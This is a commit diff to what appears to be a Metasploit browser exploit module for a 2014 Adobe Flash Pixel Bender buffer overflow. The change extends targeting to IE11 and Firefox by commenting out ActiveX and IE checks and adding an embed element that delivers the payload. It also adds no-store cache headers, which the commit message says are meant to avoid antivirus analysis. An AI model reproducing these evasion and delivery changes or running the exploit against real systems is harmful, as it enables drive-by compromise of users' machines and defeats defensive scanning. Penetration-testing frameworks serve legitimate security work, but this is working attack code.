Updates to adobe_flash_pixel_bender_bof:

1. Added embed-element to work with IE11 (and Firefox). Removed browser-requirements for ActiveX (clsid and method). 2. Added Cache-Control header on SWF-download to avoid AV-detection (no disk caching = no antivirus-analysis :). Testing performed: Successfully tested with Adobe Flash Player 13.0.0.182 with IE9, IE10 and IE11 running on Windows 7SP1. (Exploit will trigger on FF29, although sandboxed.)
2014-05-18 22:43:51 +02:00 · 2014-05-18 22:43:51 +02:00 · 033757812d
parent a97d9ed54f
commit 033757812d
1 changed files with 7 additions and 6 deletions
--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
        This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
        vulnerability occurs in the flash.Display.Shader class, when setting specially
        crafted data as its bytecode, as exploited in the wild in April 2014. This module
-        has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
-        Windows XP SP3, Windows 7 SP1 and Windows 8.
+        has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
+        over Windows XP SP3, Windows 7 SP1 and Windows 8.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
-          :clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
-          :method  => "LoadMovie",
+          #:clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
+          #:method  => "LoadMovie",
          :os_name => Msf::OperatingSystems::WINDOWS,
-          :ua_name => Msf::HttpClients::IE,
+          #:ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
        },
      'Targets'        =>
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote

    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
-      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=flash_payload%>" />
    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
    </object>
    </body>
    </html>